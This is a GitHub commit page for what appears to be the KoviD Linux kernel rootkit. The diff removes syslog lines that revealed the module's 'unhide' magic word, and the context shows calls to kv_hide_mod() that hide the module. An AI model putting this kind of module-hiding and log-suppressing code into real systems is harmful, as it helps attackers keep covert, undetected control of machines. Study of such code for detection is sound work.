Skip to content

Commit

Permalink
Merge pull request #103 from carloslack/kvdev
Browse files Browse the repository at this point in the history
Remove magic word from syslog
  • Loading branch information
carloslack authored Sep 28, 2024
2 parents faebad8 + c1b9318 commit a905878
Showing 1 changed file with 0 additions and 3 deletions.
3 changes: 0 additions & 3 deletions src/kovid.c
Original file line number Diff line number Diff line change
Expand Up @@ -481,7 +481,6 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
static unsigned int msg_lock = 0;
if(!msg_lock) {
msg_lock = 1;
prinfo("Your module \'unhide\' magic word is: '%s'\n", magik);
}
op_lock = 1;
kv_hide_mod();
Expand Down Expand Up @@ -773,8 +772,6 @@ static int __init kv_init(void) {


#ifndef DEBUG_RING_BUFFER
/** *pr_info because it must be shown even if DEPLOY=1 */
pr_info("Your module \'unhide\' magic word is: '%s'\n", magik);
kv_hide_mod();
op_lock = 1;
#endif
Expand Down

0 comments on commit a905878

Please sign in to comment.